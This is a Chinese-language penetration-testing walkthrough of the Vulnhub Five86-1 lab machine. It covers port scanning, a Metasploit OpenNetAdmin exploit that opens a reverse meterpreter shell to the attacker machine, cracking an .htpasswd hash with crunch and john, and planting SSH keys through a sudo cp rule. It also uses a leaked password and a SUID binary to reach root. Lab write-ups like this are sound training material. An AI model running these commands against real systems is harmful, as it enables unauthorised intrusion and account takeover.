[【渗透测试】Vulnhub Five86-1]

渗透环境环境准备

vulnhub靶机Five86-1下载地址(https://www.vulnhub.com/entry/five86-1,417/)

1
2
攻击机:192.168.207.130
靶机:192.168.207.137

下载好靶机之后直接使用VMware Workstation Pro虚拟机导入环境,启动即可,将网段设置为NAT模式 目标:获取目标靶机root目录下的flag

开始渗透

一、 获取端口信息

1.主机扫描

97d93578fa37e018.png

发现靶机的IP地址为 `192.168.207.137,然后用nmap对靶机进行详细地扫描。

2.端口扫描

使用nmap获取目标靶机开放的端口

1
nmap -sS -sV -sC -p- 192.168.207.137 -oN nmap_full_scan

9498742049a74f04.png

发现开启了22端口, OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0) 发现开启了80端口,Apache httpd 2.4.38 ((Debian)) 发现开启了10000端口,MiniServ 1.920 (Webmin httpd)

也可以使用masscan进行探测

1
masscan --rate=10000 --ports 0-65535 192.168.207.137

3.目录查找

1
dirsearch -u 192.168.207.137

e1a2d081eea94188.png

二.渗透测试

1.访问web服务

1
http://192.168.207.137

cb87a2f0495bb2cc.png

1
192.168.207.137:10000

a9f8cce8a16875fc.png

继续点击网站

出现回显

1
https://192.168.207.137:10000/

6634cd5771972fbc.png

访问发现了登录界面,但是这里初步尝试了SQL注入漏洞,失败了。这里使用暴力破解难度还是很大的,并且极其花费时间且需要一个足够强大的字典文件,果断放弃爆破,继续收集有用信息

之后

我们可以利用上面的目录扫描分析

1
http://192.168.207.137/robots.txt

d277b61249171013.png

我们访问看看

1
192.168.207.137/ona

0b80903a000e44f4.png

58c945238b8a77f1.png

去看看这个

可知道这个是OpenNetAdmin v18.1.1

2.查找漏洞

我们可以使用kali

1
searchsploit  OpenNetAdmin

8f245f59b5e0c519.png

我们可以发现

可以把攻击脚本下到你想要的目录下,我下到了桌面上

1
searchsploit -m 47772.rb

63e774f741ef9483.png

将攻击脚本复制到msf对应的目录中

1
cp '/home/kali/桌面/47772.rb'  /usr/share/metasploit-framework/modules/exploits/

然后我们使用命令来启动mfs

1
msfconsole

ecc3c5f819749f0e.png

3.反弹shell

我们执行命令来攻击

1
2
3
4
use exploit/47772
set rhosts 192.168.207.137
set lhost  192.168.207.130
exploit

出现回显

b687d2b231c7aff3.png

可以看到成功反弹回来一个meterpreter,使用python生成一个交互式的shell

b01c180da515e31e.png

三.提权过程

1.找利用点

因为这是反弹回来的shell,所以肯定看不了他的sudo命令的
查看suid命令

1
find / -perm -g=s -type f 2>/dev/null

af89edb7e308071f.png

没有发现能利用的,之前网站根目录下还有一个reports页面没有账号密码不能查看,现在可以查看了
进入reports目录,发现有一个.htaccess文件,查看其内容

之后我们要进入目录

1
2
3
4
5
6
cd ~
cd html
cd reports
ls -al
cat .htaccess
命令一步步来

9de5b1267633f11d.png

一步一步来

先到

1
2
3
cd var
cd www
ls -al

得到以下界面

0db05c96f4aedd01.png

查看内容()

1
cat  .htpasswd

e2f80bc41bde2af9.png

提示密码10位数且只有aefhrt这些字符,用crunch创建密码字典mima.txt,桌面创建user.txt里保存douglas的用户密码

创建成功

1
crunch 10 10 aefhrt -o /home/kali/桌面/mima.txt

0a7734cadbd3bb77.png

使用john爆破密码

在桌面创建user.txt 把用户名和密码放入

内容

1
douglas:$apr1$9fgG/hiM$BtsL9qpNHUlylaLxk81qY1

使用命令

1
john --wordlist=mima.txt user.txt

出现回显

822a75c9ac51061b.png

密码:

1
fatherrrrr

成功破解出密码fatherrrrr,使用su命令切换为douglas用户

2.登录用户

1
su douglas

cc93ada6f1258c66.png

看看权限

查看douglas用户的sudo命令

1
2
id
sudo -l

dcf571bae2f3b7eb.png

发现jen用户可以在无密码的情况下使用cp命令
然后在自己的家目录下面发现了.ssh文件

命令如下:

1
2
3
cd /home 
cd douglas
ls -al

2e3a203935435e21.png

那可以将”douglas“的公钥复制到”jen“的家目录下的 .ssh 这样就可以用douglas的私钥登入”jen“用户(简直聪明啊)

那就试试

1
2
3
4
5
6
7
cd /tmp
cp /home/douglas/.ssh/id_rsa.pub /tmp/authorized_keys
chmod 777 authorized_keys
sudo -u jen /bin/cp authorized_keys /home/jen/.ssh/
cp /home/douglas/.ssh/id_rsa /tmp/
chmod 600 id_rsa

一步一步来

09dfdbf4fbbb0098.png

使用ssh连接到jen用户

1
ssh -i id_rsa jen@127.0.0.1

362bfa2c44ffa570.png

有提示要我们去找邮件

1
2
cd /var/mail
cat jen

800978be8ab392cf.png

可以看到moss用户的密码是Fire!Fire!
使用su命令切换为moss用户(记住用户名要小写)

1
2
3
4
jen@five86-1:/var/mail$ su moss                 
su moss                                         
Password: Fire!Fire!                
moss@five86-1:/var/mail$

查看一下sudo命令

1
sudo -l

9946f731ac36cce2.png

可以发现使用不了

我们使用suid命令看看

1
find / -perm -u=s -type f 2>/dev/null

6780d9e258b27090.png

发现在moss用户的home目录下有一个.games/upyourgame文件进入该目录并执行该文件

3.提权

我们回到home目录

1
2
3
4
5
6
7
8
9
10
cd home
cd moss
ls -al
cd .games
./upyourgame
之后随便回答问题
你的权限就变成了root了
进入cd /root
ls
cat /flag.txt

5d6fc903a498c487.png